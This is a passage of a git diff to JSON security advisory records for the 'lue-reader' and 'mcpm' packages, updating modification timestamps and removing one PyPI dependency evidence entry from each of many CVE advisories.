a/advisories/BREW-lue-reader-CVE-2026-54280.json +++ b/advisories/BREW-lue-reader-CVE-2026-54280.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54280", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-9x8q-7h8h-wcw9", "CVE-2026-54280", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-59881.json b/advisories/BREW-lue-reader-CVE-2026-59881.json index f2268ecc75f..130f80b774c 100644 --- a/advisories/BREW-lue-reader-CVE-2026-59881.json +++ b/advisories/BREW-lue-reader-CVE-2026-59881.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-59881", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-mq44-7p77-q5h7", "CVE-2026-59881", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-69243.json b/advisories/BREW-lue-reader-CVE-2026-69243.json index 5ac8cfd2a8b..c40daf8a8c3 100644 --- a/advisories/BREW-lue-reader-CVE-2026-69243.json +++ b/advisories/BREW-lue-reader-CVE-2026-69243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-69243", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-mfx4-hv73-q22v", "CVE-2026-69243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-69244.json b/advisories/BREW-lue-reader-CVE-2026-69244.json index c1209663016..c3f35a12853 100644 --- a/advisories/BREW-lue-reader-CVE-2026-69244.json +++ b/advisories/BREW-lue-reader-CVE-2026-69244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-69244", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-cq5v-8q36-5273", "CVE-2026-69244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2012-4571.json b/advisories/BREW-mcpm-CVE-2012-4571.json index d8f99a01cb2..38d5c98b172 100644 --- a/advisories/BREW-mcpm-CVE-2012-4571.json +++ b/advisories/BREW-mcpm-CVE-2012-4571.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2012-4571", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-p3h7-3c45-qj4v", "CVE-2012-4571", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2012-5577.json b/advisories/BREW-mcpm-CVE-2012-5577.json index e9e19a2f95b..63504b056ea 100644 --- a/advisories/BREW-mcpm-CVE-2012-5577.json +++ b/advisories/BREW-mcpm-CVE-2012-5577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2012-5577", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-p86x-652p-6385", "CVE-2012-5577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2012-5578.json b/advisories/BREW-mcpm-CVE-2012-5578.json index 63980a0dafa..32307b6e861 100644 --- a/advisories/BREW-mcpm-CVE-2012-5578.json +++ b/advisories/BREW-mcpm-CVE-2012-5578.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2012-5578", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-8867-vpm3-g98g", "CVE-2012-5578", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2014-1829.json b/advisories/BREW-mcpm-CVE-2014-1829.json index d5932a9863b..3a8dc4b0df1 100644 --- a/advisories/BREW-mcpm-CVE-2014-1829.json +++ b/advisories/BREW-mcpm-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2014-1829", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2014-1830.json b/advisories/BREW-mcpm-CVE-2014-1830.json index 79623ead04b..4e31212dd78 100644 --- a/advisories/BREW-mcpm-CVE-2014-1830.json +++ b/advisories/BREW-mcpm-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2014-1830", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2015-2296.json b/advisories/BREW-mcpm-CVE-2015-2296.json index 9c5bf579b28..f7d57d89c61 100644 --- a/advisories/BREW-mcpm-CVE-2015-2296.json +++ b/advisories/BREW-mcpm-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2015-2296", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2015-8557.json b/advisories/BREW-mcpm-CVE-2015-8557.json index ed8c0b59e4c..b3285ac506b 100644 --- a/advisories/BREW-mcpm-CVE-2015-8557.json +++ b/advisories/BREW-mcpm-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2015-8557", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2016-10516.json b/advisories/BREW-mcpm-CVE-2016-10516.json index d7045d12663..59af65a9c6a 100644 --- a/advisories/BREW-mcpm-CVE-2016-10516.json +++ b/advisories/BREW-mcpm-CVE-2016-10516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2016-10516", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-h2fp-xgx6-xh6f", "CVE-2016-10516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2016-9015.json b/advisories/BREW-mcpm-CVE-2016-9015.json index 955319de204..11135313bac 100644 --- a/advisories/BREW-mcpm-CVE-2016-9015.json +++ b/advisories/BREW-mcpm-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2016-9015", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2017-11424.json b/advisories/BREW-mcpm-CVE-2017-11424.json index 20890cc690b..ad10d86a60f 100644 --- a/advisories/BREW-mcpm-CVE-2017-11424.json +++ b/advisories/BREW-mcpm-CVE-2017-11424.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2017-11424", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-r9jw-mwhq-wp62", "CVE-2017-11424", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2017-18342.json b/advisories/BREW-mcpm-CVE-2017-18342.json index 33a92382210..c1c810c0311 100644 --- a/advisories/BREW-mcpm-CVE-2017-18342.json +++ b/advisories/BREW-mcpm-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2017-18342", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2018-1000518.json b/advisories/BREW-mcpm-CVE-2018-1000518.json index 3b5e35d376e..52b973db97e 100644 --- a/advisories/BREW-mcpm-CVE-2018-1000518.json +++ b/advisories/BREW-mcpm-CVE-2018-1000518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2018-1000518", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-6g87-ff9q-v847", "CVE-2018-1000518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "16.0", - "key": "pkg:pypi/websockets@16.0", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2018-18074.json b/advisories/BREW-mcpm-CVE-2018-18074.json index 704b0ce4f4a..f1b11361612 100644 --- a/advisories/BREW-mcpm-CVE-2018-18074.json +++ b/advisories/BREW-mcpm-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2018-18074", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2018-20060.json b/advisories/BREW-mcpm-CVE-2018-20060.json index c3fcc75c9c1..55185b5ec3d 100644 --- a/advisories/BREW-mcpm-CVE-2018-20060.json +++ b/advisories/BREW-mcpm-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2018-20060", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2018-25091.json b/advisories/BREW-mcpm-CVE-2018-25091.json index 21c507c3c1a..e3e61ae9ff6 100644 --- a/advisories/BREW-mcpm-CVE-2018-25091.json +++ b/advisories/BREW-mcpm-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2018-25091", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-11236.json b/advisories/BREW-mcpm-CVE-2019-11236.json index b56806004f8..d335e0577af 100644 --- a/advisories/BREW-mcpm-CVE-2019-11236.json +++ b/advisories/BREW-mcpm-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-11236", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-11324.json b/advisories/BREW-mcpm-CVE-2019-11324.json index cd6d83a95f4..1684847e78f 100644 --- a/advisories/BREW-mcpm-CVE-2019-11324.json +++ b/advisories/BREW-mcpm-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-11324", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-14322.json b/advisories/BREW-mcpm-CVE-2019-14322.json index 01f088e6abd..270b747751f 100644 --- a/advisories/BREW-mcpm-CVE-2019-14322.json +++ b/advisories/BREW-mcpm-CVE-2019-14322.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-14322", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-j544-7q9p-6xp8", "CVE-2019-14322", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-14806.json b/advisories/BREW-mcpm-CVE-2019-14806.json index 5358ade6cc9..3f35c5d0d9a 100644 --- a/advisories/BREW-mcpm-CVE-2019-14806.json +++ b/advisories/BREW-mcpm-CVE-2019-14806.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-14806", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-gq9m-qvpx-68hc", "CVE-2019-14806", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-18874.json b/advisories/BREW-mcpm-CVE-2019-18874.json index 70ee02dbb65..26c24bd6bf2 100644 --- a/advisories/BREW-mcpm-CVE-2019-18874.json +++ b/advisories/BREW-mcpm-CVE-2019-18874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-18874", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-qfc5-mcwq-26q8", "CVE-2019-18874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "psutil", - "subject_version": "7.2.2", - "key": "pkg:pypi/psutil@7.2.2", - "resource": "psutil" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-20477.json b/advisories/BREW-mcpm-CVE-2019-20477.json index 15bf0a8f8b9..8b11ed0b7de 100644 --- a/advisories/BREW-mcpm-CVE-2019-20477.json +++ b/advisories/BREW-mcpm-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-20477", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-14343.json b/advisories/BREW-mcpm-CVE-2020-14343.json index 84e527288b9..81f50f040e6 100644 --- a/advisories/BREW-mcpm-CVE-2020-14343.json +++ b/advisories/BREW-mcpm-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-14343", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-1747.json b/advisories/BREW-mcpm-CVE-2020-1747.json index 4648a93c872..a209f9b13dc 100644 --- a/advisories/BREW-mcpm-CVE-2020-1747.json +++ b/advisories/BREW-mcpm-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-1747", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-26137.json b/advisories/BREW-mcpm-CVE-2020-26137.json index 10ee8671ce9..8b550e3f418 100644 --- a/advisories/BREW-mcpm-CVE-2020-26137.json +++ b/advisories/BREW-mcpm-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-26137", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-28724.json b/advisories/BREW-mcpm-CVE-2020-28724.json index f1af9b23bb7..ef6df817789 100644 --- a/advisories/BREW-mcpm-CVE-2020-28724.json +++ b/advisories/BREW-mcpm-CVE-2020-28724.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-28724", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-3p3h-qghp-hvh2", "CVE-2020-28724", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-7212.json b/advisories/BREW-mcpm-CVE-2020-7212.json index 3f1c1695260..1cb16f745b8 100644 --- a/advisories/BREW-mcpm-CVE-2020-7212.json +++ b/advisories/BREW-mcpm-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-7212", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-7694.json b/advisories/BREW-mcpm-CVE-2020-7694.json index 237a0903350..0fc5667ae6f 100644 --- a/advisories/BREW-mcpm-CVE-2020-7694.json +++ b/advisories/BREW-mcpm-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-7694", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.49.0", - "key": "pkg:pypi/uvicorn@0.49.0", - "resource": "uvicorn" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-7695.json b/advisories/BREW-mcpm-CVE-2020-7695.json index 4d484ec0ace..ade0feff7e2 100644 --- a/advisories/BREW-mcpm-CVE-2020-7695.json +++ b/advisories/BREW-mcpm-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-7695", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.49.0", - "key": "pkg:pypi/uvicorn@0.49.0", - "resource": "uvicorn" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-20270.json b/advisories/BREW-mcpm-CVE-2021-20270.json index 7cf4f7d4510..a3fa7f2fade 100644 --- a/advisories/BREW-mcpm-CVE-2021-20270.json +++ b/advisories/BREW-mcpm-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-20270", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-27291.json b/advisories/BREW-mcpm-CVE-2021-27291.json index cbdc7ad2526..71f78e9fb51 100644 --- a/advisories/BREW-mcpm-CVE-2021-27291.json +++ b/advisories/BREW-mcpm-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-27291", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-28363.json b/advisories/BREW-mcpm-CVE-2021-28363.json index e224c510a7d..160d33b3921 100644 --- 